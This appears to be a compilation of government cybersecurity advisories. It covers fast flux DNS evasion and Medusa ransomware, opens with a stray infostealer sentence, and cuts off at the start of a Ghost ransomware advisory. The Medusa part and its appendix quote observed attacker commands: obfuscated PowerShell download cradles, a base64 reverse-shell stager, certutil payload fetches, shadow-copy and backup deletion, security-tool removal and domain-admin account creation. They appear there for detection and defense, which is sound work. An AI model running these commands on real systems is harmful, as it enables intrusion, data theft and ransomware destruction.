Infostealers are everywhere for a while now. If this kind of malware is not aggressive, their impact can be much more impacting to the victim. Attackers need always more and more data to be sold or reused in deeper scenarios. A lot of infostealers are similar and have the following capabilities:
Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult.
The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence.
The authoring agencies recommend all stakeholders—government and providers—collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity.
Download the PDF version of this report: Fast Flux: A National Security Threat
When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked.
Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [T1568.001].
Malicious cyber actors use two common variants of fast flux to perform operations:
1. Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique.
Note: This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers.
2. Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique.
Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure. Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include:
The key advantages of fast flux networks for malicious cyber actors include:
Fast flux is not only used for maintaining C2 communications, it also can play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities. Similarly, fast flux is used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts.
Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel (See Figure 3). A customer just needs to add a “dummy server interface,” which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain “clean” and unblocked.
The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking.
As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability.
The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [CISA CPG 3.A]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics.
1. Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions.
2. Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle though tens or hundreds of IP addresses per day.
3. Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes.
4. Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information.
5. Use flow data to identify large-scale communications with numerous different IP addresses over short periods.
6. Develop fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior.
7. Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts.
8. Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity.
To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics.
Note: Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content.
1. DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses
2. Reputational filtering of fast flux enabled malicious activity
3. Enhanced monitoring and logging
4. Collaborative defense and information sharing
5. Phishing awareness and training
The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment.
However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat.
For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about Selecting a Protective DNS Service. [9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s DIB Cybersecurity Services and factsheet. CISA also offers a Protective DNS service for federal civilian executive branch (FCEB) agencies. See CISA’s Protective Domain Name System Resolver page and factsheet for more information.
Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats.
The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization’s cyber defenses.
[1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service
[2] Australian Signals Directorate’s Australian Cyber Security Centre. “Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025. https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers
[3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023. https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf
[4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021. https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them
[5] Unit 42. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022. https://unit42.paloaltonetworks.com/trident-ursa/
[6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024. https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service
[7] Silent Push. ‘From Russia with a 71’: Uncovering Gamaredon’s fast flux infrastructure. New apex domains and ASN/IP diversity patterns discovered. 2023. https://www.silentpush.com/blog/from-russia-with-a-71/
[8] DNS Filter. Security Categories You Should be Blocking (But Probably Aren’t). 2023. https://www.dnsfilter.com/blog/security-categories-you-should-be-blocking-but-probably-arent
[9] National Security Agency. Selecting a Protective DNS Service. 2021. https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF
The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
This document was developed in furtherance of the authoring cybersecurity agencies’ missions, including their responsibilities to identify and disseminate threats, and develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
National Security Agency (NSA):
Cybersecurity and Infrastructure Security Agency (CISA):
Federal Bureau of Investigation (FBI):
Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC):
Canadian Centre for Cyber Security (CCCS):
New Zealand National Cyber Security Centre (NCSC-NZ):
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.
Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation.
FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.
Download the PDF version of this report:
For a downloadable list of IOCs, see:
AA25-071A STIX XML
(XML, 34.30 KB
)
AA25-071A STIX JSON
(JSON, 42.28 KB
)
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.
Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:
Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include:
21 (FTP)22 (SSH)23 (Telnet)80 (HTTP)115 (SFTP)443 (HTTPS)1433 (SQL database)3050 (Firebird database)3128 (HTTP web proxy)3306 (MySQL database)3389 (RDP)Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information.
Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress.
Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003].
In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings.
powershell -exec bypass -enc <base64 encrypted command string>In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027].
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format operator (-f) followed by three arguments to specify character replacements in the base64 payload.
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('<base64 payload string>')-f'<character replacement 0>','<character replacement 1>', '<character replacement 2>')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))The obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell.
In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001].
FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:
Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to:
-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s).SYSTEM level privileges.cmd /c.One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389:
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allowThen, a rule to allow remote WMI connections is created:
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yesFinally, the registry is modified to allow Remote Desktop connections:
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fMimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement.
Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070].
Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.
FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.
Table 1 lists the hashes of malicious files obtained during investigations.
| Files | Hash (MD5) | Description |
|---|---|---|
| !!!READ_ME_MEDUSA!!!.txt | Redacted | Ransom note file |
| openrdp.bat | 44370f5c977e415981febf7dbb87a85c | Allows incoming RDP and remote WMI connections |
| pu.exe | 80d852cd199ac923205b61658a9ec5bc | Reverse shell |
Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.
| Email Addresses | Description |
|---|---|
| key.medusa.serviceteam@protonmail.com | Used for ransom negotiation |
| medusa.support@onionmail.org | Used for ransom negotiation |
| mds.svt.breach@protonmail.com | Used for ransom negotiation |
| mds.svt.mir2@protonmail.com | Used for ransom negotiation |
| MedusaSupport@cock.li | Used for ransom negotiation |
See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
| Technique Title | ID | Use |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures. |
| Initial Access | TA0001 | Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access. |
| Phishing | T1566 | Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims. |
| Technique Title | ID | Use |
|---|---|---|
| Indicator Removal: Clear Command History | T1070.003 | Medusa actors attempt to cover their tracks by deleting the PowerShell command line history. |
| Obfuscated Files or Information: Encrypted/Encoded File | T1027.013 | Medusa actors use a well-known evasion technique that executes a base64 encrypted command. |
| Obfuscated Files or Information | T1027 | Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable. |
| Indicator Removal | T1070 | Medusa actors deleted their previous work and tools installed. |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Medusa actors killed or deleted endpoint detection and response tools. |
| Technique Title | ID | Use |
|---|---|---|
| Network Service Discovery | T1046 | Medusa actors utilized living of the land techniques to perform network enumeration. |
| File and Directory Discovery | T1083 | Medusa actors utilized Windows Command Prompt for filesystem enumeration. |
| Network Share Discovery | T1135 | Medusa actors queried shared drives on the local system to gather sources of information. |
| System Network Configuration Discovery | T1016 | Medusa actors used operating system administrative utilities to gather network information. |
| System Information Discovery | T1082 | Medusa actors used the command systeminfo to gather detailed system information. |
| Permission Groups Discovery: Domain Groups | T1069.002 | Medusa actors attempt to find domain-level group and permission settings. |
| Technique Title | ID | Use |
|---|---|---|
| Credential Access | TA0006 | Medusa actors harvest credentials with tools like Mimikatz to gain access to systems. |
| OS Credential Dumping: LSASS Memory | T1003.001 | Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz. |
| Technique Title | ID | Use |
|---|---|---|
| Lateral Movement | TA0008 | Medusa actors performed techniques to move laterally without detection once they gained initial access. |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration. |
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration. |
| Software Deployment Tools | T1072 | Medusa Actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network. |
| Remote Services: Remote Desktop Protocol | T1021.001 | Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally. |
| System Services | T1569.002 | Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network. |
| Windows Management Instrumentation | T1047 | Medusa actors abused Windows Management Instrumentation to query system information. |
| Technique Title | ID | Use |
|---|---|---|
| Exfiltration | TA0010 | Medusa actors identified files to exfiltrate out of victim networks. |
| Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers. |
| Technique Title | ID | Use |
|---|---|---|
| Ingress Tool Transfer | T1105 | Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress. |
| Application Layer Protocol: Web Protocols | T1071.001 | Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port 443: HTTPS. |
| Remote Access Software | T1219 | Medusa actors used remote access software to move laterally through the network. |
| Technique Title | ID | Use |
|---|---|---|
| Create Account | T1136.002 | Medusa actors created a domain account to maintain access to victim systems. |
| Technique Title | ID | Use |
|---|---|---|
| Data Encrypted for Impact | T1486 | Medusa identified and encrypted data on target systems to interrupt availability to system and network resources. |
| Inhibit System Recovery | T1490 | The process gaze.exe terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note. |
| Financial Theft | T1657 | Victims must pay to decrypt files and prevent further release by Medusa actors. |
| System Shutdown/Reboot | T1529 | Medusa actors manually turned off and encrypted virtual machines. |
| Service Stop | T1489 | The process gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites, |
FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.
FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.
The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC.
ConnectWise contributed to this advisory.
March 12, 2025: Initial version.
These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms.
| cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll |
| cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi |
| cmd.exe /c driverquery |
| cmd.exe /c echo Computer: %COMPUTERNAME% & ` echo Username: %USERNAME% & ` echo Domain: %USERDOMAIN% & ` echo Logon Server: %LOGONSERVER% & ` echo DNS Domain: %USERDNSDOMAIN% & ` echo User Profile: %USERPROFILE% & echo ` System Root: %SYSTEMROOT% |
| cmd.exe /c ipconfig /all [T1016] |
| cmd.exe /c net share [T1135] |
| cmd.exe /c net use |
| cmd.exe /c netstat -a |
| cmd.exe /c sc query |
| cmd.exe /c schtasks |
| cmd.exe /c systeminfo [T1082] |
| cmd.exe /c ver |
| cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname |
| cmd.exe /c wmic printjob |
| mmc.exe compmgmt.msc /computer:{hostname/ip} |
| mstsc.exe /v:{hostname/ip} |
| mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass} |
| powershell -exec bypass -enc <base64 encrypted command string> |
| powershell -nop -c $x = ‘D’ + ‘Own’ + ‘LOa’ + ‘DfI’ + ‘le’; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RMM tool>.msi) |
|
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( ((‘<base64 payload string>’)-f'<character replacement 0>’, ‘<character replacement 1>’,'<character replacement 2>’)))), [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
| powershell Remove-Item (Get-PSReadlineOption).HistorySavePath |
|
powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate, logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path <file path> -NoTypeInformation -Encoding UTF8 |
| psexec.exe -accepteula -nobanner -s {hostname/ip} “c:windowssystem32taskkill.exe” /f /im WRSA.exe |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -c coba.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -c openrdp.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -c StopAllProcess.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -c zam.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} c:tempx.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} cmd |
| psexec.exe -accepteula -nobanner -s {hostname/ip} cmd /c “c:gaze.exe” |
| psexec.exe -accepteula -nobanner -s {hostname/ip} cmd /c “copy ad02sysvolgaze.exe c:gaze.exe |
| psexec.exe -accepteula -nobanner -s {hostname/ip} cmd /c “copy ad02sysvolgaze.exe c:gaze.exe && c:gaze.exe” |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c coba.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c openrdp.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c zam.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} cmd |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -с newuser.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -с duooff.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -с hostname/ipwho.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -с newuser.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -с removesophos.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -с start.bat |
| psexec.exe -accepteula -nobanner -s {hostname/ip} -с uninstallSophos.bat |
| nltest /dclist: |
| net group “domain admins” /domain [T1069.002] |
| net group “Domain Admins” default /add /domain |
| net group “Enterprise Admins” default /add /domain |
| net group “Remote Desktop Users” default /add /domain |
| net group “Group Policy Creator Owners” default /add /domain |
| net group “Schema Admins” default /add /domain |
| net group “domain users” /domain |
| net user default /active:yes /domain |
| net user /add default <password> /domain [T1136.002] |
| query user |
| reg add HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 |
| systeminfo |
| vssadmin.exe Delete Shadows /all /quiet |
| vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded |
| del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk |
| netsh advfirewall firewall add rule name=”rdp” dir=in protocol=tcp localport=3389 action=allow |
| netsh advfirewall firewall set rule group=”windows management instrumentation (wmi)” new enable=yes |
| reg add “HKLMSYSTEMCurrentControlSetControlTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f |
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.
Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.
